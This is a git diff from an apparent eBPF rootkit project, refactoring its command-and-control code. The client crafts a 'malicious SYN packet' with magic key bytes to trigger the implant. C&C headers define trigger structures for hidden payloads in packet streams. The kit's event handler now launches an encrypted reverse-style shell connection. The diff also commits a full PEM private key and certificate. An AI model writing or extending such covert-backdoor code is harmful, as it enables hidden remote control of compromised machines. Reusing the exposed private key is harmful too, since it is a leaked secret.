diff --git a/src/.output/kit.o b/src/.output/kit.o index e23138d..74c91c6 100644 Binary files a/src/.output/kit.o and b/src/.output/kit.o differ diff --git a/src/bin/kit b/src/bin/kit index 914824e..d5ab35b 100755 Binary files a/src/bin/kit and b/src/bin/kit differ diff --git a/src/client/client.c b/src/client/client.c index 0626e55..c7547d1 100644 --- a/src/client/client.c +++ b/src/client/client.c @@ -12,7 +12,6 @@ #include "../common/constants.h" #include "../common/c&c.h" -#include "../common/protocol.h" #include "include/sslserver.h" // For printing with colors @@ -195,7 +194,7 @@ void activate_command_control_shell_encrypted(char* argv){ check_ip_address_format(argv); printf("["KBLU"INFO"RESET"]""Crafting malicious SYN packet...\n"); //+1 since payload must finish with null character for parameter passing, although not sent in the actual packet payload - char payload[CC_TRIGGER_SYN_PACKET_PAYLOAD_SIZE+1]; + char payload[CC_TRIGGER_SYN_PACKET_PAYLOAD_SIZE+1] = {0}; srand(time(NULL)); for(int ii=0; ii:"RESET""); - fgets(buf, BUFSIZ, stdin); - if ((strlen(buf)>0) && (buf[strlen(buf)-1] == '\n')){ - buf[strlen(buf)-1] = '\0'; - } - - char msg[BUFSIZ]; - strcpy(msg, CC_PROT_MSG); - strcat(msg, buf); - packet = build_standard_packet(8000, 9000, local_ip, argv, 4096, msg); - printf("Sending %s\n", msg); - if(rawsocket_send(packet)<0){ - printf("["KRED"ERROR"RESET"]""An error occured. Aborting...\n"); - return; - } - printf("["KBLU"INFO"RESET"]""Waiting for rootkit response...\n"); - packet = rawsocket_sniff_pattern(CC_PROT_MSG); - char* res = packet.payload; - printf("["KGRN"RESPONSE"RESET"] %s\n", res); - } + } diff --git a/src/client/client.o b/src/client/client.o index b962b63..2672517 100644 Binary files a/src/client/client.o and b/src/client/client.o differ diff --git a/src/client/include/sslserver.h b/src/client/include/sslserver.h index 0b65942..60dd944 100644 --- a/src/client/include/sslserver.h +++ b/src/client/include/sslserver.h @@ -1,7 +1,5 @@ // This code is based from the following tutorial: // https://aticleworld.com/ssl-server-client-using-openssl-in-c/ -// gcc -Wall -o server server.c -L/usr/lib -lssl -lcrypto -// sudo ./server #include "openssl/err.h" #include "openssl/ssl.h" @@ -19,19 +17,6 @@ #define USE_FUNCTIONS 0 -void instructionsForPem(void) { - printf("\n"); - printf("\n"); - printf("Did you forget to create your mycert.pem file?\n"); - printf("\n"); - printf("Run: openssl req -x509 -nodes -days 365 -newkey rsa:1024 -keyout " - "mycert.pem -out mycert.pem\n"); - printf("\n"); - printf("If you haven't, but that's my best guess of what has gone wrong..\n"); - printf("\n"); - printf("\n"); -} - #if (USE_FUNCTIONS) SSL_CTX *InitServerCTX(void) { const SSL_METHOD *method; @@ -155,28 +140,20 @@ void Servlet(SSL *ssl) { } #endif -int server_run(int argc, char **argv) { +int server_run(int port) { SSL_CTX *ctx; int server; - int portnum; const char *szPemPublic = "mycert.pem"; const char *szPemPrivate = "mycert.pem"; #if (!(USE_FUNCTIONS)) const SSL_METHOD *method; #endif - if (argc != 2) { - printf("Usage: %s \n", argv[0]); - exit(0); - } - - portnum = atoi(argv[1]); - - if (portnum < 1024) { + if (port < 1024) { if (getuid() != 0) { printf("This program must be run as root/sudo user since your port # " "(%d) is < 1024\n", - portnum); + port); exit(1); } } @@ -203,14 +180,12 @@ int server_run(int argc, char **argv) { /* set the local certificate from CertFile */ if (SSL_CTX_use_certificate_file(ctx, szPemPublic, SSL_FILETYPE_PEM) <= 0) { ERR_print_errors_fp(stderr); - instructionsForPem(); abort(); } /* set the private key from KeyFile (may be the same as CertFile) */ if (SSL_CTX_use_PrivateKey_file(ctx, szPemPrivate, SSL_FILETYPE_PEM) <= 0) { ERR_print_errors_fp(stderr); - instructionsForPem(); abort(); } @@ -229,7 +204,7 @@ int server_run(int argc, char **argv) { server = socket(PF_INET, SOCK_STREAM, 0); bzero(&addr, sizeof(addr)); addr.sin_family = AF_INET; - addr.sin_port = htons(portnum); + addr.sin_port = htons(port); addr.sin_addr.s_addr = INADDR_ANY; if (bind(server, (struct sockaddr *)&addr, sizeof(addr)) != 0) { perror("can't bind port"); @@ -252,7 +227,7 @@ int server_run(int argc, char **argv) { // this is my attempt to run HTTPS.. This is sort of the minimal header that // seems to work. \r is absolutely necessary. - const char *szHttpServerResponse = + const char *response = "HTTP/1.1 200 OK\r\n" "Content-type: text/html\r\n" "\r\n" @@ -266,7 +241,7 @@ int server_run(int argc, char **argv) { "\n"; #endif int client; - + printf("Listening for connections\n"); client = accept(server, (struct sockaddr *)&addr, &len); /* accept connection as usual */ printf("Connection: %s:%d\n", inet_ntoa(addr.sin_addr), @@ -305,8 +280,8 @@ int server_run(int argc, char **argv) { printf("Client msg:\n[%s]\n", buf); if (bytes > 0) { - printf("Reply with:\n[%s]\n", szHttpServerResponse); - SSL_write(ssl, szHttpServerResponse, strlen(szHttpServerResponse)); + printf("Reply with:\n[%s]\n", response); + SSL_write(ssl, response, strlen(response)); } else { ERR_print_errors_fp(stderr); } diff --git a/src/client/injector b/src/client/injector index a818041..26bff40 100755 Binary files a/src/client/injector and b/src/client/injector differ diff --git a/src/client/mycert.pem b/src/client/mycert.pem new file mode 100644 index 0000000..9b7c11d --- /dev/null +++ b/src/client/mycert.pem @@ -0,0 +1,81 @@ +-----BEGIN PRIVATE KEY----- +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 +A/iGISWr4/qHcINgtY1nBHeCd0EkOQ== +-----END PRIVATE KEY----- +-----BEGIN CERTIFICATE----- +MIIE+zCCAuOgAwIBAgIURgo+OnvjsvSRONRpscRzizvP+QUwDQYJKoZIhvcNAQEL +BQAwDTELMAkGA1UEBhMCRVMwHhcNMjIwNTA2MDEwMzM4WhcNMjMwNTA2MDEwMzM4 +WjANMQswCQYDVQQGEwJFUzCCAiIwDQYJKoZIhvcNAQEBBQADggIPADCCAgoCggIB +AKpElD4Wn11yE15GMDf97qhy5MYN2X0oAiXSE/epBhc6KSsnJjQhD0WvgdP9n6GM +zX9EUXN1r6sg4iHoWL1dBaYhKA2Qsgjx7r8XYHyyCrl4m4ps/5dr8kZsaLB4M5r9 +LhQSb8mZubjQO2CvTwYIBisKLfmPg4AcDsBOj0C+lKBrnCRGwpy6YuWcll0UvOtd +Zy5psvK/pNUatViYkg/KRn5dObQSgUPlPlDj2jVCaH8HUgh4T+E/hHsvOgrgpzm4 +SVLqFS0sgewegrUvjNUCo/7JvcQrQeXD4mCZ0wt26U4fFf6GnF2q1NES5fBa9LEK +po3UwgpAsOJFfdCi+fXpqcoNLxecL0PBrojN1yBdm2VM0YTTKBtQe/iwtcXQkkkd +SxWtCEE86Mwi7zQhZJgq67B/gGdvuZ8nKP5/oVqc4al9JCPTqHhpZqI/w9QrfyK9 +QZ8XSA8NsrTVD/GqpxpWqF6jkoT9hRWSzfFJpMsx4r2+KzeLn89j4YsvrjgrVz76 +zyxIIWA6P2ANMvLgFa71XYeQK1PZkkYbriC9wtjP7ljmDwVbLEwWyBCtCw/I/ATP +S9/d12lS8C6vXOvfn99jCN0vuXQywHJIkOtUh0q1fTDHyDbig4UzS/kpm6QKmzqb +vtzaZr0kHTfVGhrCegXjQlOcZ07XjFRMD215OBccNKKJAgMBAAGjUzBRMB0GA1Ud +DgQWBBQfgD7ZU0HjCQlRmuThMlRYnAkb/TAfBgNVHSMEGDAWgBQfgD7ZU0HjCQlR +muThMlRYnAkb/TAPBgNVHRMBAf8EBTADAQH/MA0GCSqGSIb3DQEBCwUAA4ICAQBC +VzY9Q7YXIGQRv1hw2uzpv15mQJHGIPh1YyRJMQIaAPAfvLy5Mi+IY+ZMvCfVlykD +NTxoPLiJQvwf61UOPyxOHA/TUXdLybeqiFCM025PHx/H8K482WBORPOuOFep2xf1 +A4MEFyX3aeBAEFcR0/ns2evQt4KIjmglHxmCPCTA29/6P+ObS0BtUngyFKyoCS9Z +10EakCZsC65ALV7/qU4jPrvQYU0xMSnAop+pwAFtUvKzlfrPNuCNw3jSR3yX2pZj +/Pkhjub7dlIAR+A2iwktAnv8s4U/QbOia/hfu3hDgXK5yvynfjBAHcFZ6nmZFlUH +9DyTaYObWG5s3Hz3gD4hbO4m4e4mnFqwK+Q5oNBnR0Sjw/6snowKf5rq78SJ2w0w +buoXThpknQFpvHfFnWmxcynqUp4LFWmXcK4OEkl85iwmhu/8R7rRt3K3NgrH9U18 +lya7XySsKL7tCH94B1sG81SK8l503Vs+7o37pGiehd00mj5YBuR5VqFh1QgrZQmp +wHrqLodvegwuRxpUuwrI+3IvLYB5f3n5i9uL2/n5b6Y97aTyrXijoTdmZEn68OE1 +exrEy4SJhZXu2DFkFIjFYISw73hwsXBrr54RX34Y4y5NYb7G0IXLMdiLaKzCChAC +gESIACorO+q0WCekd1dT+OyxdyzScFXMkgeu0P0Fmw== +-----END CERTIFICATE----- diff --git a/src/common/c&c.h b/src/common/c&c.h index c4893c7..bc81f4c 100644 --- a/src/common/c&c.h +++ b/src/common/c&c.h @@ -1,22 +1,31 @@ #ifndef __BPF_CC_H #define __BPF_CC_H -#include "protocol.h" - +//C&C V0 #define CC_PROT_SYN "CC_SYN" #define CC_PROT_ACK "CC_ACK" #define CC_PROT_MSG "CC_MSG#" #define CC_PROT_FIN_PART "CC_FIN" #define CC_PROT_FIN CC_PROT_MSG CC_PROT_FIN_PART -//C&C V1 -- bpv47-like trigger +//C&C V1 -- bpv47-like trigger + encrypted shell #define CC_TRIGGER_SYN_PACKET_PAYLOAD_SIZE 0x10 #define CC_TRIGGER_SYN_PACKET_KEY_1 "\x56\xA4" #define CC_TRIGGER_SYN_PACKET_KEY_2 "\x78\x13" #define CC_TRIGGER_SYN_PACKET_KEY_3_ENCRYPTED_SHELL "\x1F\x29" - #define CC_TRIGGER_SYN_PACKET_SECTION_LEN 0x02 +#define CC_PROT_COMMAND_ENCRYPTED_SHELL 0 + +//C&C V2 -- Distributed hidden payload in packet stream +struct trigger_t { + unsigned char xor_key; + unsigned int ip; + short unsigned int port; + unsigned char pad1; + short unsigned int pad2; + short unsigned int crc; +}; #endif \ No newline at end of file diff --git a/src/common/protocol.h b/src/common/protocol.h deleted file mode 100644 index 466e4b3..0000000 --- a/src/common/protocol.h +++ /dev/null @@ -1,19 +0,0 @@ -#ifndef __PROTOCOL_H -#define __PROTOCOL_H - -//V1 -#define CC_PROT_COMMAND_ENCRYPTED_SHELL 0 - -//V2 -struct trigger_t { - unsigned char xor_key; - unsigned int ip; - short unsigned int port; - unsigned char pad1; - short unsigned int pad2; - short unsigned int crc; -}; - - - -#endif \ No newline at end of file diff --git a/src/user/include/utils/network/ssl_client.h b/src/user/include/utils/network/ssl_client.h index 2265269..97f7d1c 100644 --- a/src/user/include/utils/network/ssl_client.h +++ b/src/user/include/utils/network/ssl_client.h @@ -1,7 +1,5 @@ -// This is based from: -// -------------------- +// This is based from the following tutorial: // https://aticleworld.com/ssl-server-client-using-openssl-in-c/ -// gcc -Wall -o client client.c -L/usr/lib -lssl -lcrypto #include #include #include @@ -81,31 +79,21 @@ void ShowCerts(SSL *ssl) { } #endif -int clientrun(int argc, char **argv) { +int client_run(char* hostname, uint16_t portnum) { SSL_CTX *ctx; int server; SSL *ssl; static char buf[1024 * 1024]; int bytes; - char *hostname; - uint16_t portnum; #if (!(USE_FUNCTIONS)) struct hostent *host; struct sockaddr_in addr; const SSL_METHOD *method; #endif - if (argc != 3) { - printf("usage: %s \n", argv[0]); - exit(0); - } - // Initialize the SSL library SSL_library_init(); - hostname = argv[1]; - portnum = atoi(argv[2]); - #if (USE_FUNCTIONS) ctx = InitCTX(); server = OpenConnection(hostname, portnum); @@ -148,8 +136,8 @@ int clientrun(int argc, char **argv) { X509 *cert; char *line; #endif - char szRequest[4096]; - sprintf(szRequest, + char request[4096]; + sprintf(request, "GET / HTTP/1.1\r\n" "User-Agent: Wget/1.17.1 (linux-gnu)\r\n" "Accept: */*\r\n" @@ -159,7 +147,7 @@ int clientrun(int argc, char **argv) { "\r\n", hostname, portnum); - printf("Sending:\n[%s]\n", szRequest); + printf("Sending:\n[%s]\n", request); printf("\n\nConnected with %s encryption\n", SSL_get_cipher(ssl)); @@ -181,7 +169,7 @@ int clientrun(int argc, char **argv) { } #endif - SSL_write(ssl, szRequest, strlen(szRequest)); /* encrypt & send message */ + SSL_write(ssl, request, strlen(request)); /* encrypt & send message */ bytes = SSL_read(ssl, buf, sizeof(buf)); /* get reply & decrypt */ buf[bytes] = 0; diff --git a/src/user/kit.c b/src/user/kit.c index 847e162..7facc6a 100644 --- a/src/user/kit.c +++ b/src/user/kit.c @@ -109,8 +109,9 @@ static int handle_rb_event(void *ctx, void *data, size_t data_size){ printf("%s COMMAND pid:%d code:%i\n", ts, e->pid, e->code); switch(e->code){ case CC_PROT_COMMAND_ENCRYPTED_SHELL: + //TODO EXTRACT IP FROM KERNEL BUFFER printf("Starting encrypted connection\n"); - + client_run("127.0.1.1", 8500); break; default: printf("Command received unknown: %d\n", e->code);